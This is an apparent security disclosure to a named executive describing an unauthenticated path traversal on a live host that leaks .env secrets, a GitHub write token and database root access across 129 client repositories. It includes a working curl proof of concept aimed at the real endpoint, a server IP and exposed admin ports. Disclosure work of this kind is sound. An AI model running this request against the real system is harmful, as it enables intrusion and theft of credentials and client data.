SA
Security Advisory
Confidential — For the recipient only
Active vulnerability
Independent Security Research · April 2026

Your source code was stolen
in under 5 minutes.

No login. No skills. One HTTP request. The technology partner you trust with your government and enterprise systems is leaking every password, every client record, and the source code of 129 private repositories — including yours.

See what's at risk What to do today

This document has been prepared for you personally as the responsible executive. No data was exfiltrated, modified, or disclosed to any third party. Evidence is retained solely to demonstrate impact and is available on request.

Your personal exposure

Two of your own repositories are in this breach.

The recovered GitHub access token has write permission. An attacker can push modified code back into your repositories without triggering any alert. This is not a theoretical risk — the token was valid at the time of this report.

Source: .git/config file, readable without authentication.

github.com/xtremeitservices · 129 private repositories ● connected
🔒 xtremeitservices/aaz-dashboard 2023-04-05 · YOU
🔒 xtremeitservices/aaz-frontend 2023-04-04 · YOU
🔒 xtremeitservices/galadaribrothersclient
🔒 xtremeitservices/kawasakiuaeclient
🔒 xtremeitservices/mazdauaeclient
🔒 xtremeitservices/emiratevisa-backendclient
🔒 xtremeitservices/emiratevisa-frontendclient
🔒 xtremeitservices/motomoriniclient
🔒 xtremeitservices/kingfisherclient
🔒 xtremeitservices/Omodaclient
🔒 xtremeitservices/galadarirealestateclient
🔒 xtremeitservices/Signa365-Webproduct
🔒 xtremeitservices/Signa365-APIproduct
🔒 xtremeitservices/TAccounts-BEproduct
… and 115 more private repositories
By the numbers

One vulnerability. Everything exposed.

129
Private repositories with write access
59
Databases under full root control
8+
Production applications compromised
< 5min
Time to full compromise, start to finish
6
Live third-party API keys (DeepSeek, Stripe, Azure…)
Whose data is in the breach

This is not just about one company.

The 129 private repositories contain source code, credentials, and production data belonging to the following clients — alongside your own.

You
Ahmed Al Zarouni
aaz.ae · aaz-dashboard · aaz-frontend
Enterprise
Galadari Brothers
Real estate · Policies · Careers
Automotive
Kawasaki UAE
Dashboard + web
Automotive
Mazda UAE
Web + mobile + tablet
Government
Emirates Visa
Backend + frontend
Automotive
Moto Morini
Backend + website
Automotive
Omoda UAE
Web app
Hospitality
Kingfisher
Web + dashboard
SaaS product
Signa365
Document signing · Web/API/Outlook
SaaS product
TAccounts
Invoice · proposal engine
Events
Lynk · 7D Events
Event management
And more
+117
repositories and client projects
Business risk

What this costs if it becomes public.

Financial

  • UAE PDPL 2021: fines up to AED 5,000,000 per violation. Multiple tenants × multiple violations.
  • Active Stripe merchant credentials — payment fraud risk on the merchant account.
  • Leaked AI API keys (verified active) billed to the owner until noticed.
  • Incident response, forensics, and full platform rebuild cost.

Legal & Compliance

  • UAE Federal Decree-Law 45/2021 (Personal Data Protection) — notification duty to the UAE Data Office.
  • Breach of confidentiality and data-handling clauses in every client contract.
  • Civil exposure from enterprise clients (Galadari, Kawasaki, Mazda).
  • If PCI-adjacent data is in any database: PCI DSS reportable event.

Reputational

  • Your public position — Head of IT & Information Security — makes this particularly sensitive.
  • Enterprise clients will learn their source code is in attacker hands.
  • Every future AAZ product becomes a supply-chain question.
  • Media exposure risk is high — breach of this breadth rarely stays quiet.
Attacker capabilities — right now

What anyone with this vulnerability can do, today.

1

Impersonate your developers on GitHub

Push modified code into any of your 129 repositories. Backdoors shipped through your normal deployment pipeline.

2

Read, modify, or delete every client database

59 databases under one root password. Client records, password hashes, invoices, policy documents.

3

Send email as your domains

Credentialed access to SMTP, Resend, and SMTP2GO. Pixel-perfect phishing to your clients, from your own infrastructure.

4

Forge a logged-in session for any user

JWT secrets and Laravel application keys are leaked. An attacker can authenticate as any administrator without knowing their password.

5

Spend your money on AI and cloud

Live keys to DeepSeek AI, Azure Storage, Stripe, MagicHour. Billable at your account until the card maxes or someone notices.

6

Stay invisible

There is no logging, no alerting, no SIEM. A quiet attacker could have been inside for months — and we cannot prove they were not.

How it unfolds

One request. Everything falls.

A single unauthenticated HTTP request reads any file on the server. From there, every subsequent compromise is automatic.

Step 1 — entry
One HTTP request
No login, no credentials, no skill required.
POST /public/api/download-file
{"path":"../../../.env"}
All application secrets
8+ .env files, every password
Database root access
59 databases, full control
GitHub write token
129 private repos, push access
Cloud storage keys
Azure Blob, all customer files
Payment API
Stripe merchant access
Email infrastructure
SMTP, Resend, SMTP2GO
AI services
DeepSeek, MagicHour billing
Session forgery
Log in as any user, anywhere
What to do

A three-horizon response.

A pragmatic sequence — most impact first, structural fixes after the fire is out.

Today — hours

Stop the bleeding

  • 1Disable the vulnerable endpoint on bc.techfirm.ae.
  • 2Revoke the exposed GitHub token. Attacker currently has write access.
  • 3Rotate MySQL root and all 8+ application database passwords.
  • 4Rotate every leaked third-party API key (Stripe, Azure, DeepSeek, Resend, SMTP2GO).
  • 5Block public access to phpMyAdmin.
This week

Contain and investigate

  • 1GitHub audit log: every clone and push since 2023-04-04.
  • 2Force password reset for users of all 8+ applications.
  • 3Re-issue all JWT secrets and Laravel APP_KEY values.
  • 4Engage incident response if any indicator of actual exploitation.
  • 5Assess notification duty under UAE PDPL with legal counsel.
This month

Rebuild on solid ground

  • 1Retire CentOS 7 (end of life since June 2024). No security patches for 22 months.
  • 2Move applications into isolated containers — no more shared filesystem.
  • 3Adopt a secret manager (Vault, AWS Secrets Manager). Stop shipping .env files to production servers.
  • 4Mandatory external security review before any AAZ-adjacent product returns to the public internet.
  • 5Basic SOC/SIEM so a future compromise does not go unnoticed.
For your security team
Technical evidence — proof of concept & sample leaked credentials
Expand
proof-of-concept.sh
# One request. No authentication.
curl -s 'https://bc.techfirm.ae/public/api/download-file' \
  -X POST \
  -H 'Content-Type: application/json' \
  -d '{"path":"../../../.env"}'

# Returns the full application .env file with DB credentials,
# mail passwords, and the Laravel APP_KEY.
Sample leaked credentials (masked)
MySQL root
b•••••••••••d (12 chars)
GitHub PAT
ghp_••••••••••••••••••••••••••••••••••••• (40 chars)
DeepSeek AI
sk-•••••••••••••••••••••••••••••• (35 chars)
Azure Storage
••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••• (88 chars, base64)
Stripe
sk_test_••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••• (107 chars)
Resend
re_•••••••••••••••••••••••••••••••••• (35 chars)
Laravel APP_KEY
base64:•••••••••••••••••••••••••••••••••••••••••••= (44 chars, base64)

Full, unmasked values are retained exclusively by the researcher and provided on request via a secure channel.

Infrastructure at a glance
Server
185.224.139.208
Operating system
CentOS 7 (EOL)
PHP / OpenSSL
7.2 / 1.0.2k (EOL)
Admin panels public
2031, 2083, 2087, 2096
PostgreSQL public
port 5432
Anonymous FTP
enabled
Tenant isolation
none
Findings summary
CRITPath traversal (unauth)
CRITphpMyAdmin credential leak
CRITCross-tenant secret exposure
CRITShared-hosting compromise
CRITGitHub PAT exposure
CRITMySQL root access
HIGHActive 3rd-party API keys
MEDFastAPI docs exposed (116)
MEDOpen registration (Signa365)

Full 1,000-line technical report (reproduction steps, remediation code, CVSS scores) available on request.